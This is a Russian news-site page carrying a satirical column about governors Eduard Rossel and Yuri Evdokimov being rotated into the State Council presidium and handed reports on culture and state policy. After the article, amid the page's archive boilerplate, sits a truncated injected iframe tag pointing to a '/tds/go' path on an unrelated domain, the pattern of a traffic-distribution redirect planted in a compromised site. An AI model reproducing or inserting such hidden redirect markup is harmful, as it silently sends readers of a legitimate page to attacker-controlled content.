Губернаторов научат всему

Федеральная пресса в очередной раз обратила внимание на деятельность Эдуарда Росселя в качестве члена Госсовета РФ. И в очередной раз ему достались не самые лестные комментарии журналистов.


В президиуме Государственного совета РФ произошла очередная ротация. Это в Госдуме и Совете Федерации спикеров и их заместителей избирают всерьез и надолго. В Госсовете дело поставлено проще: президент периодически меняет «правящую» семерку губернаторов (по одному от каждого федерального округа). Но главное ноу-хау госсоветовского механизма заключается не в этой нечувствительной и ни для кого не обидной смене руководства. А в том, что благодаря ротации каждый член Госсовета может попробовать себя на самых разных и неожиданных поприщах.

Например, вошел в нынешнюю семерку свердловский губернатор Эдуард Россель. Местные уральские политологи немедленно истолковали этот факт как слабо завуалированную поддержку Федерального центра Росселю на приближающихся губернаторских выборах. Сам он, едва став членом президиума, заявил, что теперь главной темой для обсуждения в Госсовете должна стать проблема разграничения полномочий между федеральным Центром и регионами. Но... пока получил поручение подготовить предложения по дальнейшему развитию и совершенствованию государственной культурной политики.

Никто не отрицает заслуги свердловчан в области культуры. И все же специфика области такова, что Эдуарду Эргартовичу, вероятно, чаще приходится решать проблемы металлургии, тяжелого машиностроения и связанной с этим дурной экологии. Однако известное дело: прикажет государь – сейчас же стану акушером. И вот Эдуард Россель уже готовит доклад о приоритетах развития российской культуры. Сетует, что «доклад очень сложный, в нем более 100 страниц». Одно утешение, что на помощь губернатору готовы прибыть в Екатеринбург руководители российских творческих союзов во главе с самим министром культуры Михаилом Швыдким. Справятся, будем надеяться. Непонятно только, неужели сам Михаил Швыдкой не написал уже давным-давно такого доклада? Да, конечно, написал, и не один, и не он один, мало ли в министерстве клерков разного калибра. Но речь же не о министерстве, а о Госсовете.

В середине июня весь Госсовет съедется в юбилейный Петербург для обсуждения нелегких судеб российской культуры (да заодно и попраздновать – как сообщает пресса, приедут с женами). Одним из предметов самого пристального внимания госсоветчиков станет «нематериальное духовное наследие». Объясняется, что имеется в виду «оригинальный фольклор народов России и национальные языки». Но, судя по самой формулировке (неМАТериальное духовное наследие), не всякий оригинальный фольклор может рассчитывать на поддержку со стороны Госсовета. Есть еще одна область человеческой деятельности, в которой все поголовно разбираются так же хорошо, как и в культуре.

Мурманский губернатор Юрий Евдокимов, также свежеротированный в семерку, получил задание еще более масштабное, чем коллега Россель. Сообщается, что он как член президиума «возглавит одну из рабочих групп Госсовета, разрабатывающих основные вопросы внутренней и внешней политики Российской Федерации». Здесь, во-первых, 100-страничным докладом никак не обойтись, одна преамбула потянет на все 150. А во-вторых, даже и задуматься-то боязно, кому же придется поехать в Мурманск, чтобы помочь Юрию Евдокимову разработать этакие вопросы на уровне, достойном члена президиума Госсовета.

Остается еще одна сфера, в которой все разбираются теоретически, но всегда не хватает специалистов-практиков. Накануне игры со Швейцарией таковые специалисты могут очень понадобиться. Если чего не знают, Газзаев им расскажет, это он может. Только бы они самолеты строить не начали!



<iframe src="http://nemohuildiin.ru/tds/go

Нажмите для вставки кода в блог
Распечатать

Архив Новостей

«    Октябрь 2020    »
ПнВтСрЧтПтСбВс
 1234
567891011
12131415161718
19202122232425
262728293031 

Контакты